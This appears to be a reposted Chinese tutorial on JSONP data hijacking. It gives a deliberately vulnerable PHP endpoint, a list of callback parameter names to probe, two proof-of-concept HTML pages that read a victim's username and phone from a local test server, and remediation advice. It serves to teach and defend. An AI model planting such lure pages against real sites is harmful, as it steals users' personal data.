位置: IT常识 - 正文

JSONP数据劫持漏洞(json解析漏洞)

编辑:rootadmin
JSONP数据劫持漏洞 ​介绍

推荐整理分享JSONP数据劫持漏洞(json解析漏洞),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:json劫持漏洞验证方法,json数据解析错误是什么意思,json数据解析错误是什么意思,jsonp漏洞利用,json loads dumps,jsonp漏洞利用,json劫持漏洞验证方法,json劫持怎么防止,内容如对您有帮助,希望把文章链接给更多的朋友!

JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

更通俗的说法:JSONP 就是利用 <script> 标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用 callback 函数。

漏洞原理

和 CSRF 类似,都需要用户交互,而 CSRF 主要是以用户的账户进行增删改的操作,jsonp 则主要用来劫持数据。

当网站通过 JSONP 方式传递用户敏感信息时,攻击者可以伪造 JSONP 调用页面,诱导被攻击者访问来达到窃取用户信息的目的;jsonp 数据劫持就是攻击者获取了本应该传给网站其他接口的数据。

漏洞代码

假设这是目标网站上的代码,然后我们利用漏洞就可以劫持到里面的数据,如username、phone

<?php//test.phpheader('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"username" : "d4m1ts","phone" : "13888888888"});';?>

快速启动 php 环境

php -S 127.0.0.1:9999 实现效果

利用场景

如上图,所有包含有callback等回调函数的,且请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞

如果返回内容是 json 格式的,但是没有回调函数,我们可以尝试手动添加回调函数去试试运气,一些常见的如下:

_callback=mstkey_cb=mstkeycallback=mstkeycb=mstkeyjsonp=mstkeyjsonpcallback=mstkeyjsonpcb=mstkeyjsonp_cb=mstkeyjson=mstkeyjsoncallback=mstkeyjcb=mstkeycall=mstkeycallBack=mstkeyjsonpCallback=mstkeyjsonpCb=mstkeyjsonp_Cb=mstkeyjsonCallback=mstkeyca=mstkey漏洞利用

当我们发现信息泄露的 jsonp 接口以后,我们需要构造一个恶意 html 页面,然后引诱受害者去访问这个网站,一旦访问了这个网站,脚本就会自动运行,就会向这个接口请求用户的敏感数据,并传送到攻击者的服务器上。

POC基于实现回调函数<script>function xxx(data){ alert(data.username);}</script><script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>JSONP数据劫持漏洞(json解析漏洞)

保存为 html,诱导受害者访问,可见成功获取到了username信息

image-20220322171224615

简而言之:存在信息泄漏的 JSONP 接口http://127.0.0.1:9999/test.php?callback=xxx,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

另一个 POC基于 jquery<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script><script type="text/javascript"> $.getJSON("http://127.0.0.1:9999/test.php?callback=?", function(data){ alert(data.phone); });</script>

image-20220322173916125

修复建议

扩展

修复建议

接受请求时检查referer来源;

在请求中添加token并在后端进行验证;

严格过滤 callback 函数名及 JSON 里数据的输出。

扩展

如果目标的 header 头没有设置Content-Type为json,而是html,那么也可以造成 XSS 漏洞

一个获取 QQ 号的 JSONP 劫持实例[1]

image-20220322185037473

推荐阅读:JSONP 挖掘与高级利用[2]

参考资料

[1]一个获取 QQ 号的 JSONP 劫持实例: http://www.piaoyi.org/network/get-qq-haoma-js.html

[2]JSONP 挖掘与高级利用: http://drops.xmd5.com/static/drops/papers-6630.html

本文链接地址:https://www.jiuchutong.com/zhishi/299576.html 转载请保留说明!

上一篇:单目测距原理与实现(代码可运行)(单目测距精度)

下一篇:强化学习——Q-Learning算法原理

  • 税金及附加和应交税费的关系
  • 金税盘技术维护费怎么申报
  • 个体每月开票超10万
  • 电子普通发票重新开
  • 购进石料再加工算自产吗
  • 核算科目拨出专票怎么弄
  • 企业交税前可以扣除的费用
  • 工会经费可以支付哪些费用
  • 承担客户装修费怎么入账
  • 批发零售企业用什么软件好
  • 西安的税务局
  • 进项税额转出需要发票吗
  • 实际缴纳增值税税额是什么意思
  • 个人房产税征收标准
  • 增值税税负的概念和如何确定税负
  • 营改增后固定资产报废处置收入计税
  • 增值税专用发票怎么开
  • 异地工程需要预交税吗
  • 一般纳税人高速公路通行费税率
  • 保险代理公司做什么
  • 住房公积金证书更新
  • 出票人账号是付款号吗
  • 资产计税基础是怎么填
  • 信息技术服务在开票系统怎么选
  • 消费税怎样做分录
  • 机动车检测工作
  • 研发过程中材料费计入
  • 事业单位租赁收入的处理
  • 如何设置系统自带的输入法
  • 股东借款作为项目资本金
  • PHP:pg_get_notify()的用法_PostgreSQL函数
  • php实现观察者模式
  • 先开票后发货合法吗
  • 开源cti
  • chatbot下载
  • 讲讲vue3下会造成响应式丢失的情况
  • 交互式命令操作
  • 资本化利息支出现金流量表计入哪里
  • 固定资金是什么科目
  • 怎样计算负债率
  • c语言中的typedef struct
  • 电子发票开出后如何查看
  • 工业企业取得土地收益
  • 金税盘怎么向分盘分配发票
  • 营业总收入包括营业外收入吗
  • mssqlserver数据能删吗
  • 新会计准则折旧年限
  • 债券到期收益率被定义为使债券的()
  • 实收资本减少的要交什么税
  • 公司盈利的钱怎么拿出来
  • 以前年度损益调整在报表哪里体现
  • 签劳动合同的员工有哪些
  • 原材料登记什么明细账
  • 新组建的公司该怎样开展工作
  • 财务人员需要填报的报表有哪些
  • haproxy教程
  • 请问在哪里可以买到震楼器
  • centos如何删除用户
  • win7浏览器主页怎么设置
  • win7网络问题
  • 如何修改win7电脑用户密码
  • linux filezilla使用教程
  • [置顶]电影名字《收件人不详》
  • Cocos2dx3.2 Crazy Tetris 游戏输入(键盘事件,重力事件,触摸屏事件)
  • css对象
  • cocos 2d x
  • opengl渲染流程图
  • jquery可以实现哪些效果
  • unity ulua
  • jquery mobile开发工具
  • JavaScript弹出窗口
  • javascript函数大全
  • 深入浅析是什么意思
  • 上海市个人所得税计算
  • 河北省国家税务局电子税务局官网入口
  • 申报期一般是什么时候
  • 单据整理方法
  • 延安市地方税务局电话
  • 纳税申报的期限是什么意思
  • 应缴纳资源税税额怎么计算
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设